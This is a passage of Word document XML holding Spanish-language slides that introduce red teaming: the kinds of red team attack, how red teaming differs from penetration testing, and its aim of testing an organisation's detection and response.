          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>infraestructura</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51BC2B64" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1433"/>
        </w:tabs>
        <w:ind w:left="1433" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Los ataques realizados por los Equipos Rojos se dividen en 3 grupos:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD96DE6" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2153"/>
        </w:tabs>
        <w:spacing w:before="42"/>
        <w:ind w:left="2153" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Cibernético (los ataques digitales incluyen la web, la red y otras tecnologías en la nube)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4259F0D6" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2153"/>
        </w:tabs>
        <w:spacing w:before="45"/>
        <w:ind w:left="2153" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Ataques sociales (Explotar el comportamiento de las personas)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367CB9C6" w14:textId="7DC7BD90" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E" w:rsidP="007A7B84">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2153"/>
        </w:tabs>
        <w:spacing w:before="45"/>
        <w:ind w:left="2153" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Físico (Ataques que involucran mano de obra física)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69EFA902" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1433"/>
        </w:tabs>
        <w:ind w:left="1433" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Las operaciones de un Red Team son similares a una prueba de penetración, pero son más específicas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A33A7E4" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="266"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1ABC9A77" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1433"/>
        </w:tabs>
        <w:spacing w:line="552" w:lineRule="exact"/>
        <w:ind w:left="1433" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Uno de los principales objetivos de un Red Team es probar la detección y respuesta de la organización</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507E8964" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:line="552" w:lineRule="exact"/>
        <w:ind w:left="1434"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Capacidades.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2169AA14" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:line="552" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="0" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="298" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DAE988E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1119"/>
        </w:tabs>
        <w:spacing w:before="131" w:line="211" w:lineRule="auto"/>
        <w:ind w:right="1516"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Los ataques realizados por los Red Teams son similares a las técnicas de ataque empleadas por los actores de amenazas con intenciones maliciosas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1F70E0" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1838"/>
        </w:tabs>
        <w:spacing w:before="63"/>
        <w:ind w:left="1838" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Emulación de Red Team - Copiar técnicas de ataque de actores de amenazas (sustituto)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773A33CA" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1838"/>
        </w:tabs>
        <w:spacing w:before="43"/>
        <w:ind w:left="1838" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Simulación de Red Team: imita el comportamiento de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>los</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>actores</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>amenazas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0EE1B43D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="264"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03CC3259" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1117"/>
        </w:tabs>
        <w:spacing w:line="552" w:lineRule="exact"/>
        <w:ind w:left="1117" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Un Equipo Rojo intentará ingresar y acceder a información confidencial de cualquier manera posible, como</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB43DEC" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:line="552" w:lineRule="exact"/>
        <w:ind w:left="1119"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Lo más silenciosamente posible sin dejar huellas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB86C69" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="318"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E074204" w14:textId="7852E30E" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E" w:rsidP="007A7B84">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1119"/>
        </w:tabs>
        <w:spacing w:before="1" w:line="211" w:lineRule="auto"/>
        <w:ind w:right="2485"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Las simulaciones de ataques del mundo real de Red Team son para mejorar significativamente la eficacia de la </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>infraestructura</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> de la </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>organización</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377C7682" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1119"/>
        </w:tabs>
        <w:spacing w:line="211" w:lineRule="auto"/>
        <w:ind w:right="833"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Grandes empresas como Microsoft y agencias de defensa, etc., utilizan equipos rojos cibernéticos para realizar evaluaciones </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>en</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> sus </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>propias</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> redes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDB3803"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1220" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="298" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41009C50" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F797F01" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="030A3052" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38EC5CEE" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="176"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EB5F792" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="9236"/>
        </w:tabs>
        <w:ind w:right="832"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Pruebas de penetración</w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:tab/>
        <w:t>Equipo Rojo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E7761B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BAAAA06" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="226"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D497534" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="0" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="298" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0622419B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1826"/>
        </w:tabs>
        <w:spacing w:before="181" w:line="189" w:lineRule="auto"/>
        <w:ind w:left="1826" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="15732736" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="552BADAB" wp14:editId="07B25BF5">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="12192000" cy="11938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23" name="Graphic 23"/>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24" name="Textbox 24"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="12192000" cy="1193800"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="209545C5" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                              <w:pPr>
                                <w:spacing w:before="496"/>
                                <w:ind w:left="11"/>
                                <w:jc w:val="center"/>
                                <w:rPr>
                                  <w:rFonts w:ascii="Calibri Light"/>
                                  <w:sz w:val="88"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Calibri Light"/>
                                  <w:color w:val="FFFFFF"/>
                                  <w:spacing w:val="-10"/>
                                  <w:sz w:val="88"/>
                                </w:rPr>
                                <w:t>Pruebas de penetraci</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Calibri Light"/>
                                  <w:color w:val="FFFFFF"/>
                                  <w:spacing w:val="-10"/>
                                  <w:sz w:val="88"/>
                                </w:rPr>
                                <w:t>ó</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Calibri Light"/>
                                  <w:color w:val="FFFFFF"/>
                                  <w:spacing w:val="-10"/>
                                  <w:sz w:val="88"/>
                                </w:rPr>
                                <w:t>n vs Red Teaming</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group w14:anchorId="552BADAB" id="Group 22" o:spid="_x0000_s1040" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:960pt;height:94pt;z-index:15732736;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">
                <v:shape id="Graphic 23" o:spid="_x0000_s1041"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" path="m12192000,l,,,1193291r12192000,l12192000,xe" fillcolor="#b34512" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Textbox 24" o:spid="_x0000_s1042"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09545C5" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                        <w:pPr>
                          <w:spacing w:before="496"/>
                          <w:ind w:left="11"/>
                          <w:jc w:val="center"/>
                          <w:rPr>
                            <w:rFonts w:ascii="Calibri Light"/>
                            <w:sz w:val="88"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Calibri Light"/>
                            <w:color w:val="FFFFFF"/>
                            <w:spacing w:val="-10"/>
                            <w:sz w:val="88"/>
                          </w:rPr>
                          <w:t>Pruebas de penetraci</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Calibri Light"/>
                            <w:color w:val="FFFFFF"/>
                            <w:spacing w:val="-10"/>
                            <w:sz w:val="88"/>
                          </w:rPr>
                          <w:t>ó</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Calibri Light"/>
                            <w:color w:val="FFFFFF"/>
